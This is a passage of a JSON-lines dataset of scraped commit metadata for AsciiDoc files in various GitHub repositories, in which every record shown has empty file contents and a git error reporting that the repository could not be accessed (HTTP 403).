masaruh\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cwurm\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,dongjoon-hyun\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,henakamaMSFT\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,awislowski\/elasticsearch,alexshadow007\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,awislowski\/elasticsearch,a2lin\/elasticsearch,girirajsharma\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,kalimatas\/elasticsearch,nomoa\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra5-rc,wangtuo\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra5-rc,dongjoon-hyun\/elasticsearch,jprante\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,jprante\/elasticsearch,dpursehouse\/elasticsearch,nazarewk\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,gmarz\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,zkidkid\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,cwurm\/elasticsearch,gmarz\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,LewayneNaidoo\/elasticsearch,palecur\/elasticsearch,pozhidaevak\/elasticsearch,myelin\/elasticsearch,sreeramjayan\/elasticsearch,nknize\/elasticsearch,trangvh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,lks21c\/elasticsearch,myelin\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jprante\/elasticsearch,dongjoon-hyun\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/elasticsearch,gfyoung\/elasticsearch,JSCooke\/elasticsearch,girirajsharma\/elasticsearch,vroyer\/elassandra,mortonsykes\/elasticsearch,yanjunh\/elasticsearch,wangtuo\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,cwurm\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,GlenRSmith\/elasticsearch,sreeramjayan\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,dongjoon-hyun\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,cwurm\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,sreeramjayan\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,JSCooke\/elasticsearch,ricardocerq\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra,wuranbo\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,zkidkid\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,ricardocerq\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,zkidkid\/elasticsearch,shreejay\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,avikurapati\/elasticsearch,gfyoung\/elasticsearch,trangvh\/elasticsearch,palecur\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,awislowski\/elasticsearch,awislowski\/elasticsearch,wuranbo\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,liweinan0423\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,yanjunh\/elasticsearch,MisterAndersen\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,nomoa\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,avikurapati\/elasticsearch,winstonewert\/elasticsearch,cwurm\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,strapdata\/elassandra5-rc,uschindler\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,camilojd\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,nomoa\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,alexshadow007\/elasticsearch,JervyShi\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,wuranbo\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sreeramjayan\/elasticsearch,maddin2016\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/groovy-api\/client.asciidoc","new_file":"docs\/groovy-api\/client.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53e939f93a13a27672a71a6f787a63ec36ea1ff9","subject":"Update 2015-04-27-a-stupid-error-in-swift.adoc","message":"Update 2015-04-27-a-stupid-error-in-swift.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-27-a-stupid-error-in-swift.adoc","new_file":"_posts\/2015-04-27-a-stupid-error-in-swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9765188539207f099159d8366f5fcb2cbc7cdfd7","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80dc212fe7d68f4c6d65b3bece84e93525467a23","subject":"Update 2016-07-15-Inteligencia-Artificial.adoc","message":"Update 2016-07-15-Inteligencia-Artificial.adoc","repos":"christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io","old_file":"_posts\/2016-07-15-Inteligencia-Artificial.adoc","new_file":"_posts\/2016-07-15-Inteligencia-Artificial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christianmtr\/christianmtr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4532446c1df5bc2087d410946dc0025d6074abf9","subject":"y2b create post 3 Cool Gadgets Under $80","message":"y2b create post 3 Cool Gadgets Under $80","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-20-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2017-05-20-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"032a6ae0c2c2f126ee00ee4910ba97d57c379c5b","subject":"Add Countdowns","message":"Add Countdowns\n","repos":"juxt\/tick,juxt\/tick","old_file":"doc\/cookbook\/countdown.adoc","new_file":"doc\/cookbook\/countdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3071b85c7cd35aa8b432d4eab50fdc071afc867b","subject":"Update howto-setup-build.adoc","message":"Update howto-setup-build.adoc","repos":"adi9090\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr","old_file":"docs\/howto-setup-build.adoc","new_file":"docs\/howto-setup-build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97bf02b54ca952e9c6096be34997fc99d7472013","subject":"Update 2013-09-04-Back-to-school.adoc","message":"Update 2013-09-04-Back-to-school.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-09-04-Back-to-school.adoc","new_file":"_posts\/2013-09-04-Back-to-school.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf7598fd436dc157c20a7b1dfdaf4bc8ad1a1fa","subject":"y2b create post Enable LTE on the Nexus 4!","message":"y2b create post Enable LTE on the Nexus 4!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-24-Enable-LTE-on-the-Nexus-4.adoc","new_file":"_posts\/2012-11-24-Enable-LTE-on-the-Nexus-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e214a4cdf92bd03d378e4c969860527eefb51ff0","subject":"Update 2018-04-13-Amazon-Echover.adoc","message":"Update 2018-04-13-Amazon-Echover.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0635dbff2b3efb68254031e8d6bd57ee19c6553b","subject":"Update 2016-08-12-My-first-development-job-was-a-nightmare.adoc","message":"Update 2016-08-12-My-first-development-job-was-a-nightmare.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-08-12-My-first-development-job-was-a-nightmare.adoc","new_file":"_posts\/2016-08-12-My-first-development-job-was-a-nightmare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79ebe47e494d9fd0f421f1851042533f418287ca","subject":"Update 2018-06-26-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-26-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-26-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-26-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba53578ff270f6bf9e73d5e2fde8057ca4eb693d","subject":"y2b create post This thing's a BEAST (Zoom H6 Unboxing \\u0026 Test)","message":"y2b create post This thing's a BEAST (Zoom H6 Unboxing \\u0026 Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-13-This-things-a-BEAST-Zoom-H6-Unboxing-u0026-Test.adoc","new_file":"_posts\/2013-08-13-This-things-a-BEAST-Zoom-H6-Unboxing-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dca91a72c84e8a434d0de821fcc38ea98fb66d7","subject":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","message":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b4588f8261f9889530771a7bc1564b19824a3c","subject":"y2b create post What Makes The Moto Z2 Force So Special?","message":"y2b create post What Makes The Moto Z2 Force So Special?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-24-What-Makes-The-Moto-Z2-Force-So-Special.adoc","new_file":"_posts\/2017-08-24-What-Makes-The-Moto-Z2-Force-So-Special.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c5356767b2641ebb931ac67315a4ebc781c6ab","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e1e3733aea47103e490f5d16080212d9e9a0b7c","subject":"Update 2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","message":"Update 2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","new_file":"_posts\/2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ad627a3ed2334d4ca9747803f61c16b0a8c11e6","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbc63297f63a2e9247e629ed7b4c1ce1e1905683","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2895538e97f8631aa1ab718115e43174e0a14859","subject":"[release-notes] KUDU-2013 is fixed in Kudu 1.5","message":"[release-notes] KUDU-2013 is fixed in Kudu 1.5\n\nChange-Id: Ie3098b05747bc19b5d1a8f931d171cd4048c8bbf\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7840\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\nTested-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc1bfb499247d741ac9dc8dbc56daa58e40dd4e2","subject":"Create jme3_ai.adoc","message":"Create jme3_ai.adoc\n\nFirst pass at AI page for wiki.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3_ai.adoc","new_file":"src\/docs\/asciidoc\/jme3_ai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"0307cf73c62c4bb0c1f60f944be513dbec503284","subject":"improved documentation","message":"improved documentation\n","repos":"smiklosovic\/ZeroPush-java","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smiklosovic\/ZeroPush-java.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2a32a42c6efff40469f4b10fdd06b6c314e6e6c","subject":"added travis ci build status","message":"added travis ci build status\n","repos":"ahus1\/saltconsul-examples,ahus1\/saltconsul-examples,ahus1\/saltconsul-examples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/saltconsul-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18c9be65d71152085981b4ea2ee54eb2146ef8b7","subject":"dump of lecture #8 notes: layering & UDP","message":"dump of lecture #8 notes: layering & UDP","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture08_20171002.adoc","new_file":"lecture08_20171002.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e48d66af8d2c2b8a0843bd3c809b1169c2553c4","subject":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdbb73e9d6fef880fc3d20902a81f87b4a4c2271","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bda8e902313d13b60fa4d2f4d518ed4bb82dc3","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"017c30154a2eb1965e5cc2ec484e43001240bf0e","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"623e7f5964295c3775c80d2189c6ffa803b64eee","subject":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","message":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-23-AppleIsDeliberatelySlowingDownYouriPhone.adoc","new_file":"_posts\/2017-12-23-AppleIsDeliberatelySlowingDownYouriPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9827904271d0884bb574a8cb1a4abae30457d1","subject":"Create Windows.adoc","message":"Create Windows.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/Windows.adoc","new_file":"wiki\/installation\/Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158038b149ba0d203b2fea638fe1d2735f48cb9d","subject":"y2b create post Razer Edge Pro Review (My final thoughts)","message":"y2b create post Razer Edge Pro Review (My final thoughts)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-18-Razer-Edge-Pro-Review-My-final-thoughts.adoc","new_file":"_posts\/2013-04-18-Razer-Edge-Pro-Review-My-final-thoughts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"174589827ae6c775acd52ce0e831dc5ece563d6f","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 